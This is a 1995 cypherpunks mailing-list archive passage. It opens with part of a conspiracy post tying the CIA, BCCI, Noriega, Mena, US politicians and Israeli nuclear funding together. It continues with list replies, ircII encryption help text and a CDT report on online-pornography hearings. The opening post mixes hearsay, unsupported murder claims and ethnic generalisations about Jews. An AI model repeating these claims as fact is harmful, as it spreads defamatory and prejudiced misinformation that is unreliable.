based in Panama, Mexico, and Mena, Arkansas. CIA money was paid to Noriega through the Panamanian branch of BCCI. The CIA and U.S. Army only acknowledge paying Noreiga $322,226 between 1955 and 1986 (*The New York Times*, January 19, 1991). Be that as it may, Noriega deposited $33 million in his account (under the name of the Panamanian Defense Forces) at the Panamanian branch of BCCI. The head of this branch was the son of a former director of intelligence in Pakistan. The CIA also used BCCI branches in Pakistan to launder payments to the Afghan rebels, and Pakistani officials used the same bank to launder heroin profits. The finance minister of Pakistan, Sarti Asis, confirms that the bank did launder CIA contributions to the Afghan rebels, but claims it was "not even handling 1 percent of total drug money" (*Financial Times*, July 25, 1991). The amount the CIA recalls paying Noriega is too small. Noriega had much earlier gotten into trouble with the State Department because of his drug dealing. But this changed when his support was needed in the negotiations for a new Panama Canal Treaty. "By 1976, Noriega was fully forgiven. CIA Director George Bush arranged to pay Noriega $110,000 a year for his services, put the Panamanian up as a houseguest of his deputy CIA director, and helped to prevent an embarrassing prosecution of several American soldiers who had delivered highly classified U.S. intelligence secrets to Noriega's men. . . . "If Carter needed friends in Panama to smooth the way for a canal treaty, Reagan (who strongly opposed that treaty) needed them to support the Contra cause. . . . CIA payments to Noriega resumed when Reagan took office in 1981, starting at $185,000 a year. At their peak, in 1985, Noriega collected $200,000 from the Agency. The CIA deposited the money in Noriega's account at the Bank of Credit and Commerce International, two of whose units later pleaded guilty to laundering drug money. CIA Director William Casey frequently met with Noriega alone in Washington" (Peter Dale Scott and Jonathan Marshall, *Cocaine Politics: Drugs, Armies, and the CIA in Central America*, University of California Press, 1991). That Noriega was necessarily used as an NSA asset also follows from the fact that Panama served as the listening post to much of South America. The Bush-Noriega-BCCI-Mena connection continued. Barry Seal, who flew money, drugs, and arms out of Mena, Arkansas, acquired his job through George Bush. After Seal was indicted in Ft.Lauderdale, Florida, in 1983 for a shipment of 200,000 Quaaludes, he tried in vain to make a deal with the DEA. He found a more sympathetic audience in the Vice President: ". . . in March 1984, while out of jail on an appeal bond, 'Seal flew his Lear jet to Washington and telephones Vice President Bush's office'; and he spoke on the street to staff members of the vice president's South Florida Task Force" (Scott and Marshall). How did Jackson Stephens react to all this activity in his back yard? Well, among other things, Stephens and his Worthen National Bank invested in Harken Energy, a Texas company in which George Bush, Jr., was a board member. "The money Stephens invested came through the Swiss BCCI subsidiary" (Rachel Ehrenfeld). What about Bill Clinton, Governor of Arkansas? Ex-CIA agent Cord Meyer has privately confided to a friend of mine (to whom Meyer has no reason to lie) that he recruited Clinton through the London station while Clinton was a student in England. This Clinton was hardly ignorant of CIA activity or devoid of CIA contact. In 1987 First American bought the National Bank of Georgia, formerly acquired from Bert Lance by Pharaon. Another BCCI-First American connection was Robert Gray, a First American director, and head of the Washington office of the public relations firm Hill & Knowlton. Gray represented BCCI and did favors for Caspar Weinberger, among others. "In October 1988, three days after the Bank of Credit and Commerce International (BCCI) was indicted by a federal grand jury for conspiring with the Medellin Cartel to launder $32,000,000 in illicit drug profits, the bank hired H&K [Hill and Knowlton] to manage the scandal. Robert Gray also served on the board of directors of First American Bank, the Washington D.C. bank run by Clark Clifford (now facing federal charges) and owned by BCCI. Gray was close to, and helped in various ways, top Reagan officials. When Secretary of Defense Caspar Weinberger's son needed a job, Gray hired him for $2,000 a month" ("Hill & Knowlton, Robert Gray, and the CIA," by Johan Carlisle, *Covert Action Quarterly*, #44, Spring 1993). It was also Hill & Knowlton, you will recall, who later brought us the staged melodrama in the House Human Rights Caucus. The production starred the tearful "Nayirah"--in fact daugher of the Kuwaiti Ambassador to the U.S. She told of Iraqi soldiers taking babies out of incubators and leaving them on the cold floor to die. (Someone later alleged that her follow-up story about Iraqi soldiers roasting Belgian babies, using bayonets as spits, had to be dropped when it was discovered that there were in fact no Belgians in the Middle East.) George Bush was to repeat this concocted story a dozen times in the next few days, in the process of whipping up war fever against his old business associate, Saddam Hussein. BCCI was closed down by the Bank of England, acting in conjunction with others, on July 5, 1991. When BCCI closed, many of its money-management, money-laundering, and monetary-intelligence duties were transferred to FinCEN, a newly created unit of the U.S. Treasury. The Mena connections to Clinton and Bush have now, through Jackson Stephens, been extended to Robert Dole. Jackson Stephens (along with Tyson) has recently thrown his support behind the Dole campaign. In this regard it is perhaps useful to note that: "On November 27, 1987, an Arkansas State Police detective received a call from a reporter for information about an investigation into an aircraft maintenance firm named Rich Mountain Aviation. Located at a small airport in the little town of Mena, which stands virtually alone in the far west of Arkansas near the Oklahoma border, Rich Mountain was at the center of secret operations including cocaine smuggling in the name of national security. The reporter was seeking confirmation that the drug network operating out of Rich Mountain was part of Lt. Colonel Oliver North's network. He believed this group was smuggling cocaine into the US through Mena and using the profits to support the Contras as well as themselves. "Arkansas State Police Detective Russell Welch . . . was called by an Arkansas sheriff six weeks later who related that he had information indicating that US Senator Robert Dole was concerned about the Rich Mountain investigation. In particular, the sheriff's informant stated that Dole was worried that the investigation might in some way harm George Bush" (Alan A Block, "Drugs, Law, and the State," Hong Kong University Press, 1992). By contrast to Pakistan's ultimately inept attempt at nuclear weapon construction, Israel's nuclear warfare system had thrived. Parts of this system included the national military command center, the Bor, located beneath Tel Aviv; the subterranean strategic air command post on the edge of the Negev at Nevatim Air Base; the nuclear fuel reactor at Dimona; the nuclear weapons laboratories at Nahal Soreq; the missile test range at Yavne; the underground factory at Be'er Yaakov where the Jericho long-range missiles are manufactured; the nuclear weapons design lab (Division 20) and missile design development lab (Division 48) and weapons assembly plant at Rafael; the nuclear weapons bunkers in the Negev at Tel Nof Air Base; and the Jericho missiles in bunkers west of Zekharyeh in the Judean hills. "By marrying atomic bombs first to long-range aircraft in the Black Squadrons and ultimately to intercontinental ballistic missiles, Israel become the first Third World country to post a strategic threat to a superpower. That development was not lost on the Kremlin. Following the test in September 1989 of an advanced Jericho-2 ballistic missile, whose range covered the oil fields at Baku and could possibly reach the port of Odessa as well, a Soviet Foreign Ministry spokesman said that 'Israel is known to possess a technological basis necessary for the creation of nuclear weapons. The availability of delivery systems makes Israel a source of danger, far exceeding the boundaries of the Middle East region'" (William E. Burrows and Robert Windrem, *Critical Mass*, Simon & Schuster, 1994). Where did the money to pay for all this come from? In the beginning it was a simple matter of collecting donations. "In 1960, a Committee of Thirty (Jewish millionaires) was asked to quietly raise funds for the nuclear weapons project. It collected $40 million for the construction of the reactor and the adjoining, fabulously expensive, underground plutonium separation plant at Dimona" (Burrows and Windrem). But life did not stay this simple. For example, the BCCI-Bush- Noriega-Mena connection to drug smuggling was matched by an similar Israeli connection to arms and drug dealing and money laundering. Anything went in the holy crusade to built the bomb and the associated missile delivery systems. Just as the pension funds controlled by Robert Maxwell were looted to pay for Mossad operations in Europe (Victor Ostrovsky, *The Other Side of Deception*, HarperCollins, 1994, p. 203), so were American S&Ls in effect looted (or burdened with debt) by the financial machinations of the "Committee of Thirty" to help generate the vast funds needed to maintain and expand Israel's defense industry. Some of these funds found their way into offshore accounts held by U.S. politicians and defense personnel as bribes, kickbacks, "campaign" contributions, and payment for stolen secrets. That, for example, Noreiga was a Mossad, as well as CIA, asset follows from the fact his closest confidant and advisor was Michael Harari, formerly number three man in the Mossad, who specialized in assassination. Harari had fouled-up a case and had the wrong man killed, and was transferred to Mexico where he became station chief for Latin America. After allegedly retiring, Harari went to Panama as a security advisor to Noreiga, where he trained UESAT, Noriega's elite personnal bodyguards. During the U.S. invasion of Panama, the U.S. helped Harari escape back to Israel. On the Central and Latin American money-laundering side, Scott and Marshall relate, in a long footnote: "One of the most intriguing reports of an Israeli-Colombian drug connection was the story in *Hadashot* that the Cali cartel 'employs Israelis, especially in transferring funds from drug sales in the U.S. to the bank accounts of the heads of the cartel in Colombia and Panama. They are also assisted by banking services in Israel' (September 1, 1989). The newspaper alleged that the Cali cartel is run by Colombian Jews; actually, they are only involved in its money-laundering operations. Jews who emigrated from Europe in the 1930s established banking and money-channels exploited by the drug entrepreneurs in the 1970s and 1980s (interview with a federal agent, November 15, 1989). One of the chief Cali money launderers was Isaac Kattan, a drug associate of both Alberto Sicilia-Falcon and Juan Ramon Matta Ballesteros (Mills, *Underground Empire*, 168; Kerry report, 286-88). Kattan boasted that he invested his millions in Israel bonds (*Newsweek*, July 20, 1981). Kattan had connections to Nicaraguans through the cocaine-trafficking Espinosa brothers (*New York Times*, February 28, 1981) and the Popular Bank and Trust, owned by a prominent Nicaraguan exile and used as a conduit for Contra and State Department humanitarian funds (*Miami Herald*, June 14, 1987; *Village Voice*, July 1, 1986). In 1988, federal authorities broke up a nationwide money- laundering ring serving the Cali cartel. It was run by two Israelis who won the cooperation of a network of Hassidic Jews and a former Israeli Air Force captain by claiming they were moving the money on behalf of Mossad to finance 'anti-Communist guerrillas in Central America,' presumably the Contras. (Ibid; *Kol Ha'ir*, April 14, 1989; *Northern California Jewish Bulletin*, January 13, 1989; United Press International, March 17, 1989.) Nuclear weapons. Money laundering. This juxtaposition leads us back to BCCI and a body in Virginia. The death of investigative reporter Danny Casolaro was, like that of Vince Foster, alleged to be "suicide" in the face of all contrary evidence. Three days before his murder at the hands of hut-dwelling wackos, Casolaro showed a friend some checks drawn on BCCI: "Ben Mason [an old friend] arrived at Casolaro's about 3:30 P.M. 'I was really hungry and anxious to go get something to eat,' he recalled, 'but he was taking his time, as usual. He took me downstairs, pulled out a box, and showed me some pages. Five separate pages, spread them out on the floor. The first had something to do with some arms deals. I remember the name Khashoggi. It was about Iran-Contra.' "The second and third pages were photocopies of checks, made out for $1 million and $4 million; they were photocopies of checks drawn on BCCI . . . accounts held by Adnon Khashoggi, the international arms merchant and factotum for the House of Saud, and by Manucher Ghorbanifar, the arms dealer and Iran-Contra middleman." (James Ridgeway and Doug Vaughan, "The Last Days of Danny Casolaro, *The Village Voice*, October 15, 1991). [To be continued] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBljlmX1Kn9BepeVAQFJ5gP+IGqG2mCF9u0FVKpNzJYCfLMv8ip+LFcY lfOOczoK0V1znELeJc1R531/sYMC2iNxKR5O8z8eYiQX87qS054xcu1k+ye6QY1G z77tgFD3sQqu+4utEhkCD4o+BpwzdZ1dc3w+ZgEEIHtwPwZWzbmn7g1cvIvpdIJv LGwiE7dD/tw= =WIpY -----END PGP SIGNATURE----- From a_friend at mail.onetouch.com Fri Jul 28 14:47:22 1995 From: a_friend at mail.onetouch.com (greg pitz) Date: Fri, 28 Jul 95 14:47:22 PDT Subject: carol.... Message-ID: <9507282147.AA08308@toad.com> > In general, it isn't necessary to CC the world on your first interaction > with a customer service department; perhaps if you had sent us several > messages and we hadn't answered you, this would have been an appropriate > response. As it is, the situation is almost certainly either a human Sigh, but you haven't had the pleasure of getting to know Carol & her ways as we have..... ................................. pitz at onetouch.com greg pitz .. From perry at panix.com Fri Jul 28 15:06:46 1995 From: perry at panix.com (Perry E. Metzger) Date: Fri, 28 Jul 95 15:06:46 PDT Subject: now! Grabbe, X, re. Foster, NSA, BCCI, etc. In-Reply-To: Message-ID: <199507282206.SAA11720@panix4.panix.com> Brad Dolan writes: > Subject: Part X: Allegations re Vince Foster, the NSA, and Bank Spying > > -----BEGIN PGP SIGNED MESSAGE----- > > Allegations Regarding Vince Foster, the NSA, and > Banking Transactions Spying, Part X This is cypherpunks, a mailing list for people interested in cryptography and its social implications. This is not "Conspiracy Buffs Digest: All The Silly Conspiracy Theories You Can Read". Please take the noise postings elsewhere. Perry From fc at all.net Fri Jul 28 15:29:02 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Fri, 28 Jul 95 15:29:02 PDT Subject: your mail In-Reply-To: Message-ID: <9507282222.AA29615@all.net> > > On Fri, 28 Jul 1995, Dr. Frederick B. Cohen wrote: > > > Philo Zimmerman would almost certainly > > win if they ever took him to court, but by harassing him in this more > > subtle way, they destroy the impact of PGP in the marketplace, get MIT > > to support an official (and perhaps customized for the NSA to have weak > > keys) version, > > I've personally pulled apart the innards of both MIT pgp 2.6.2 and the > non-MIT pgp 2.6.2i in order to generate large primes and full RSA keys. > > There are no hacks in MIT pgp that cause it to generate weak keys. How (specifically) do you know that this is true? Key generation is very tricky stuf, and very subtle changes can have very profound impacts. I doubt that Zimmerman's original was truly perfect at this either, but how do we really know? -- -> See: Info-Sec Heaven using our New Super Secure World-Wide-Web Server -> Free: Test your system's security (scans deeper than SATAN or ISS!) ---------------------- both at URL: http://all.net ---------------------- -> Read: "Protection and Security on the Information Superhighway" John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95 ------------------------------------------------------------------------- Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From sdw at lig.net Fri Jul 28 15:29:13 1995 From: sdw at lig.net (Stephen D. Williams) Date: Fri, 28 Jul 95 15:29:13 PDT Subject: IRC encryption Message-ID: I've ducked out of the IRC world mostly after the first couple years, but this looks like you could setup pgp/rsa.perl/something that would be interesting: *** Help on ENCRYPT Usage: ENCRYPT [| []] ENCRYPT allows you to hold an encrypted conversations with a person or a whole channel. Once a nickname/channel and key is specified, all messages you send to that nickname/channel will automatically be encrypted using the given key. Likewise, any messages from that nickname/channel will automatically be decrypted. ircII is smart enough to know if the incoming message isn't encrypted and will not attempt to decrypt it. If you received an encrypted message from someone for whom you haven't specified a key, it will be displayed as [ENCRYPTED MESSAGE]. The can be any text which is to be used an they key for encryption/decryption of the conversation. It is up to you and the people you wish to talk to about how to agree upon a key and how to communicate it to one another. For example, if user CheeseDog wishes to talk encryptedly with user DogCheese, they must first agree on an encryption key (case sensitive), say foo. Then user CheeseDog must issue a ENCRYPT DogCheese foo and user DogCheese must issue a ENCRYPT CheeseDog foo Thereafter, all messages sent between CheeseDog and DogCheese will be encrypted and decrypted automatically. If ENCRYPT is given with a nickname but no key, then encrypted conversation is ended with that user. If ENCRYPT is given with no arguments, the list of encrypted user and keys are displayed. IrcII uses a built in encryption method that isn't terribly secure. You can use another if you so choose, see SEE ENCRYPT_PROGRAM for information about this. If you are sending encrypted messages to a user or channel, you can toggle it off and on in a message line by inserting the control-E character in the input line. This is usually done by hitting control-Q then control-E. An inverse video E will appear in the input line. Note: Control-q is bound (see BIND) to quote_character by default. It is frequently necessary to change this to some other char. See Also: SET ENCRYPT_PROGRAM *** You have new email. *** No help available on encrypt_program: Use ? for list of topics *** Help on ENCRYPT_PROGRAM Usage: SET ENCRYPT_PROGRAM Sets the program used to encrypt and decrypt messages. The program selected must take an encryption key as the first command line argument to work with IRCII. sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From flatline at ironhorse.com Fri Jul 28 15:52:11 1995 From: flatline at ironhorse.com (Christopher E. Stefan) Date: Fri, 28 Jul 95 15:52:11 PDT Subject: CDT report on Senate and House hearings on Online Pornography Message-ID: Somewhat interesting it seems, an ultra-conservative House is the First Amendment's bigest friend on the Online "porn" issue, while a much more moderate Senate is it's biggest enemy ... -- Christopher E Stefan * flatline at ironhorse.com * finger for PGP key ---------- Forwarded message ---------- ------------------------------------------------------------------------------- ------------------------------------------------------------------------ ****** ******** ************* ******** ********* ************* ** ** ** *** POLICY POST ** ** ** *** ** ** ** *** July 26, 1995 ** ** ** *** Number 22 ******** ********* *** ****** ******** *** CENTER FOR DEMOCRACY AND TECHNOLOGY ------------------------------------------------------------------------ A briefing on public policy issues affecting civil liberties online ------------------------------------------------------------------------ CDT POLICY POST Number 22 July 26, 1995 CONTENTS: (1) Senate Judiciary Committee Holds Cyberporn Hearing (2) House Science Subcommittees Hold Hearing to Explore Parental Control Technology -- Law Enforcement Officials Say Exon CDA is Wrong Approach (3) Subcribe To The CDT Policy Post Distribution List (4) About CDT, Contacting US This document may be re-distributed freely provided it remains in its entirety. ------------------------------------------------------------------------- (1) SENATE JUDICIARY COMMITTEE HOLDS CYBERPORN HEARING SUMMARY On Monday July 24, 1995 the Senate Judiciary Committee held the first every hearing on the issue of children's access to inappropriate material on the Internet. The principal focus of the hearing was to discuss Senator Grassley's "Protection of Children from Computer Pornography Act of 1995" (S. 892). CDT Executive Director Jerry Berman testified before the panel. Senator Grassley (R-IA) deserves praise for holding the first Congressional hearing on this important issue, as well as for taking great pains to ensure that both sides of the issue were represented. Although CDT may disagree with Senator Grassley's approach, we believe that this hearing represented an essential step towards advancing the dialogue on what has become an over-hyped and dramatically misunderstood issue. Senator Grassley's legislation, which has been co-sponsored by several other prominent members such as Dole, Hatch, and Thurmond, would impose criminal penalties on a service provider that "knowingly" transmits indecent material to a minor, or who "willfully" permits its network to be used to transmit indecent material to a minor (S. 892, Sec (b)(2) & (b)(3)). Two important points emerged from the testimony: 1. Current law prohibits the distribution of obscenity and child pornography, as well as online stalking and solicitation of minors. As troubling and disturbing as some of the testimony was, no evidence was presented that there are gaps in current law which would be filled by the Grassley legislation. 2. Serious questions exist as to the constitutionality of the Grassley Bill. Although Senator Grassley has repeatedly stated that his bill is narrowly drawn and targets only the bad actors, no evidence was presented to establish that a court would not interpret the statute more broadly, resulting in a complete ban on constitutionally protected speech online. WITNESSES Witnesses testifying before the panel included: * Donnelle Gruff, a 15 year old Florida girl described as a victim of an online stalker, * Patricia Shao, a mother of two from Baltimore MD and volunteer for Enough Is Enough * Dr. Susan Elliot, a mother from McLean VA * Bill Burrington, Assistant General Counsel, America Online * Barry Crimmins, a children's rights advocate * Stephen Balkam, Executive Director, Recreational Software Advisory Counsel * Jerry Berman, Executive Director, Center for Democracy and Technology * Michael S. Hart, Executive Director of Project Gutteberg, Professor of Electronic Texts, Illinois Benedictine College * Dee Jepson, Enough Is Enough (an anti-pornography group) DOES THE GRASSLEY BILL PROTECT CHILDREN? The testimony of 15 year old Donnelle Gruff focused on her experience as the victim of a stalker, while Dr. Elliot and Ms. Shao, two mothers of young children, described how their children had used commercial online services to access files they deemed inappropriate. Donnelle Gruff testified that she had been harassed and stalked by the sysop of a Florida BBS she had visited. The sysop had obtained her name, age, and address from her records and reportedly stalked Gruff while she was at home. During questioning however, Gruff's step-father told Senator Leahy that Florida law enforcement officials were currently investigating the case, and that they had given no indication that current law is insufficient with respect to prosecuting such cases. Senator Leahy noted that, as difficult and disturbing as Gruff's case is, it illustrates a need for additional law enforcement resources and education, but is not an issue of gaps in current federal or state laws. Senator Patrick Leahy (D-VT) noted similar recent prosecutions in Florida, and noted that the Grassley legislation does not explicitly prohibit online stalking of minors. In addition, Senator Leahy questioned whether government content restrictions would be an effective solution to protecting children online. "I hear a lot of rhetoric (from Congress) about getting government out of our lives, but here it seems as if the rhetoric is a little off of reality. Parents, not the government, should make the choices" about what their children should be permitted to access. Both Dr. Elliot and Ms. Shao testified that their children had stumbled across material while surfing the Internet that they, as parents, felt should not be accessible to children. Both described how their children had accessed "pornographic" images, and had been propositioned for "cybersex" while visiting a chat room on a commercial online service. In addition, Dr. Elliot described some of the images as representing 'bestiality and sodomy'. Barry Crimmins, a child protection advocate, testified that he has found numerous images of child pornography on America Online. Crimmins accused AOL of neglecting to adequately police its network. When questioned by Senator Leahy, Crimmins acknowledged that the distribution of child pornography and stalking or solicitation of minors is prohibited under current law. Crimmins added that while he thought the commercial online service should do more to remove such material, he believes that more vigorous enforcement of existing law would help to address his concerns. WHAT IS THE SCOPE OF THE ISSUE -- IS CURRENT LAW SUFFICIENT? Often in the course of the debate on this issue, the term "pornographic" is assumed to be interchangeable with both "indecency" and "obscenity". However as Senator Feingold (D-WI) noted, "pornography" has no legal standing, and when legislating in this area Congress must be careful to avoid confusing these legal distinctions. In determining what material would be considered illegal under current law, the distinction between "obscene" and "indecent" material must be made completely clear. When pressed by Senator Feingold, Dr. Elliot agreed that precise definitions are important, but argued that the files that her child downloaded from the Internet that depicted bestiality and sodomy that would be, "obscene by any standard". Images of bestiality and sodomy, as Dr. Elliot described, would be considered obscene in virtually every community in the United States, and hence are illegal under current law. Though it raises difficult jurisdictional questions, obscenity has been clearly defined by the Courts. Moreover, current law already prohibits trafficking in obscenity (18 USC Sec 1462, 1464, 1466) as well as child pornography (18 USC Sec 2252) have been successfully applied to punish conduct on computer networks. As Senator Leahy pointed out in his statement, the Justice Department is currently prosecuting cases involving material similar to that described by Dr. Elliot. Indecent material, on the other hand, is constitutionally protected and is much more difficult to define. The most common understanding of what constitutes indecent material includes the 7 dirty words, images of nudity, and other suggestive material. Moreover, the Supreme Court has ruled that any attempts by government to restrict access to indecent material must be accomplished in the "least restrictive means", and the determination of this standard is entirely dependent on the medium (see Sable Communications v. FCC, 492 US 115; 109 S.Ct. 2829; 106 L.Ed. 2d 93 (1989). Some of the material described by the witnesses would be considered obscene, and hence is already prohibited under current law. Other examples, including Ms. Shao's description of her daughter being propositioned for "cybersex", would likely not be considered obscene. Senator Russ Feingold (D-WI) urged the committee to carefully consider the distinctions between "obscene" and "indecent" speech, and urged his colleagues to "exercise caution and restraint." How broadly should we define indecency, Feingold asked Dr. Elliot, "Where should we draw the line? Should we prohibit playboy? swearing? The Catcher In The Rye? What about a discussion forum about how to avoid getting AIDS?". Because technologies currently exist to screen out messages such as those described by Ms. Shao, it is unlikely that a broad prohibition on such messages would pass constitutional muster. In this case, Congress must look to other, less restrictive methods of preventing children from having access to such materials -- including promoting the development and availability of user control technologies. CONSTITUTIONAL ISSUES Throughout the hearing, Senator Grassley stated that his legislation is carefully crafted and narrowly drawn in order to preserve the first amendment rights of adults while protecting children from inappropriate material. Grassley stated that his bill would hold an online service provider liable only in cases where they "knowingly" allow their network to be used to transmit indecent material to a minor or "willfully" allow an individual to use their network to do so. However, as CDT's Jerry Berman and America Online's Bill Burrington argued the wording of the statute and the variety of possible interpretations could lead to severe chilling effect on the free flow of legitimate information in cyberspace and force online service providers to limit or remove certain areas of their service. BROAD KNOWLEDGE REQUIREMENT The scope of the "knowing" standard in the Grassley bill is an issue of some dispute. Senator Grassley and his staff maintain that it is intended to apply narrowly, but no evidence was presented that demonstrated why a court would apply a narrow interpretation. Instead, a court is likely to interpret the "knowing" requirement broadly. Berman cautioned that because of this uncertainty, online service providers would be forced to rely on the broadest possible interpretation of the statute in order to avoid liability, resulting in a severe chilling effect on all online communications: "The threat of a broad interpretation of this new statute would compel all who provide access to the Internet to restrict *all* public discussion areas and public information sources from subscribers, unless they prove that they are over the age of eighteen. Under this statute, a service provider could note even provide Internet access to a minor *with the approval* of the child's parent. Since every online service provider would have to similarly restrict access to minors, this proposed statute would create two separate Internets, one for children and one for adults." America Online's Bill Burrington agreed, stating that the potential for a broad interpretation of the statute would compel AOL and other online service providers to adhere to the broadest possible reading in order to avoid potential liability. Burrington argued that would force AOL to shut down many parts of their service and place providers in the unenviable position of national censor. "Constitutional guarantees of free speech and press should be cautiously guarded," Burrington stated, "The online service provider industry should be encouraged to provide *voluntary* editorial control over its service and to continue its research and development of parental empowerment technology tools. This industry should not be cast in the role of national censor, determining which information may be fit for children, but nonetheless subject to criminal liability if it guesses incorrectly in any given instance." Senator Dewine (R-OH) asked several questions of many of the witnesses, and expressed concerned about the potential for an overly board interpretation of the knowledge standard. BROAD INTERPRETATION OF 'INDECENCY' As addressed earlier, a precise definition of 'indecent' speech has never been firmly established, and whether material would be considered indecent depends largely on the nature of the medium it is communicated through. Because of this, and because under the Grassley bill carriers would be liable for transmitting indecent speech, carriers would be forced to adhere to the broadest, most inclusive definition of indecency. This would include, among other things, the 7 dirty words, description of genitalia, nudity, and other material which is protected in other media. This issue was raised by Michael Hart, Executive Director of Project Gutteberg, who stressed that broad restrictions on indecency would prevent people from enjoying serious works of fiction on the Internet. Project Gutteberg makes electronic texts of books available on the Internet. Hart stated, with great emotion, that the proposed indecency restrictions contemplated by the Grassley bill would force him to remove some of Shakespeare's plays, The Catcher In The Rye, Lady Chattily's Lover, Alice in Wonderland, and other books which have been classified as indecent in some parts of the United States. Although such an effect may not be intended by the drafters of the Grassley legislation, no evidence was offered at the hearing to counter Mr. Hart's concerns. EXON vs. BERMAN CDT's Jerry Berman urged the Committee to act cautiously before voting to further restrict First Amendment guarantees of freedom of speech. Berman urged the Senate to fulfill its traditional role as the "deliberative body", and to carefully consider the implications before enacting broad new statutes to cover new media. Referring to both the Exon CDA and the Grassley bill, Berman stressed that the country would be better served if the Senate did not enact legislation simply to "provide the illusion that the United States Senate could do something in this area". This remark drew a sharp rebuttal from Senator Exon, who, though not a member of the Judiciary Committee, sat in on the hearing on the invitation of Senator Grassley. Exon defended his bill and accused CDT and others of launching "viscous attacks" against him and his legislation. Berman was not given a chance to respond. "We are concerned about the situation", Exon argued, yet "we are viscously attacked for trying to have a rational discussion. We don't want to create a false sense of security [but] we have a responsibility to protect children". In addition, Exon dismissed parental control technologies as too little too late, arguing that "for every block there is a way around that block", and that such technologies may not be available in every home, allowing children to access inappropriate material at the homes of neighbors who may not employ such tools. WHAT WAS LEARNED? Although the hearing did illustrate that sexually explicit material can be found on the Internet, no substantial evidence was presented to indicate that law enforcement is currently unable to prosecute violations of obscenity, child pornography, stalking, or child solicitation laws. Moreover, although Senator Grassley intends his legislation to be narrow, serious questions were raised about whether other, more board interpretations are possible. In our opinion, the hearing illustrated that current law is sufficient to prosecute those who stalk or solicit children online, and that complex constitutional issues are raised by congressional attempts to restrict indecent material on the Internet. PATHS TO RELEVANT DOCUMENTS Testimony is available for most of the witnesses from CDT's Communications Decency Act Issues page*: URL:http://www.cdt.org/cda.html or from our ftp archive*: URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech *Due to the volume, these materials may take several days to appear on our site. --------------------------------------------------------------------------- (2) HOUSE SCIENCE SUBCOMMITTEE HOLDS 'PARENTAL CONTROL TECHNOLOGY' HEARING Two subcommittees of the House Science Committee held a joint hearing today (July 26, 1995) on the availability of parental control technologies to prevent children from accessing inappropriate material on the Internet. The hearing, held by the Subcommittee on Basic Research, Chaired by Rep. Schiff (R-NM) and the Subcommittee on Technology, Chaired by Rep. Constance Morella (R-FL) provided an important counter-balance to Monday's Senate Judiciary Committee Hearing. Witnesses testifying before the committee included: Witnesses Demonstrating Technology Solutions * Tony Rutkowski, Executive Director of the Internet Society * Ann Duvall, President of SurfWatch Software * Steve Heaton, General Counsel and Secretary, Compuserve Law Enforcement Witnesses * Kevin Manson, Federal Law Enforcement Training Center * Mike Geraghty, Trooper, New Jersey State Police * Lee Hollander, Assistant States Attorney, Naples Florida LAW ENFORCEMENT OFFICIALS SAY CURRENT LAW SUFFICIENT, EXON BILL FLAWED Today's hearing marked the first time law enforcement officials have testified on the issue of children's access to inappropriate material on the Internet. All three law enforcement witnesses agreed that, in their experience, current law is sufficient to prosecute online stalking, solicitation of minors, and the distribution of pornography and child pornography. All three said that they are vigorously prosecuting such cases. Instead of enacting new law, New Jersey State Trooper Mike Geraghty said that protecting children is "a matter of training law enforcement officers, prosecutors, lawyers and judges about how to enforce existing laws [with respect to computer networks]. The laws are good, we have to learn how to enforce them". The three law enforcement witnesses further argued that the Senate-passed Exon/Coats Communications Decency Act is the wrong approach to addressing an issue that is already covered under existing law. "I have several problems with the Exon bill as a prosecutor, both in terms of its practical enforcement and its constitutionality" said Florida Assistant States Attorney Hollander said. TRANSACTIONAL PRIVACY PROTECTIONS CRITICIZED In an slightly unrelated asside, Florida Assistant States Attorney Lee Hollander criticized privacy protections for online transactional information privacy protections as a hindrance to law enforcement. As part of last years Digital Telephony legislation, the standard for law enforcemetn access to online transactional records (logs that indicate what files an individual accessed from online archives and electronic mail transactions) was raised from a requirement of a mere subpoena to a court order from a judge based on the showing of "specific and articulable facts" that such records are "relevant and material to an ongoing criminal investigation". The higher standard was widely seen as a victory for online privacy. In response to a question of what Congress could do to help aid enforcement of existing law, Hollander noted that the higher standard for online transactional records adds an additional burden to law enforcement investigations. Calling it part of a "ballance between privacy and law enforcement", Hollander did not suggest that Congress should repeal the court order requirement, only that it made prosecutions more difficult (*NOTE: Members of CDT staff worked closely on this issue, and consider the court order standard to be a tremendous victory for online privacy). EXON CDA CONDEMNED BY ALL Condemnation of the Senate-passed CDA was not limited to the law enforcement witnesses. Not a single member of the Subcommittee stated support for the CDA, and all expressed concern that the issue had not received sufficient public consideration by Congress. Chairwoman Morella stressed that Congress should consider technological options to empower parents to exercise control over what their children access online before rushing to enact new laws. Rep. Geren (D-TX) expressed concern about the First Amendment implications of the CDA. Rep. Vern Elhers (R-MI) stated that he would "oppose bills that make network access providers (legally) responsible for the content they carry". In what was perhaps the strongest condemnation of the Senate-passed Communications Decency Act, Rep. Zoe Loefgren (D-CA) said, "While well intentioned, the Exon bill a totally wrong approach and a complete misunderstanding of the Technology." PARENTAL CONTROL TECHNOLOGY IS THE ONLY EFFECTIVE SOLUTION Internet Society Executive Director Tony Rutkowski provided Committee members with a basic overview of the Internet and described Internet Society (ISOC) and Internet Engineering Task Force (IETF) are currently looking at content tagging and other voluntary rating systems for future Internet protocols. Rutkowski stressed that centralized, command and control style content restrictions would be ineffective in the global, distributed network environment of the Internet. Rutkowski further noted that objectionable material constitutes a minuscule amount (less than .05%) of the total traffic on the network. Because of the global reach of the Internet and the millions of potential content providers, Rutkowski argued, the only effective means of addressing the availability of inappropriate material is to provide user control applications to empower parents to block and filter what the and their children access. SurfWatch President Ann Duvall, demonstrated SurfWatch, and described the product as "just one example of the computer industry responding to needs created by the explosive growth of technology". Duvall stressed that the industry is developing solutions which are simple to use, inexpensive, and empower parents to make their own choices about what they or their children should see. Expressing concern about legislative efforts to control content online, Duvall noted that 30% of the sites blocked by SurfWatch reside outside the From Richard.Johnson at Colorado.EDU Fri Jul 28 16:37:03 1995 From: Richard.Johnson at Colorado.EDU (Richard Johnson) Date: Fri, 28 Jul 95 16:37:03 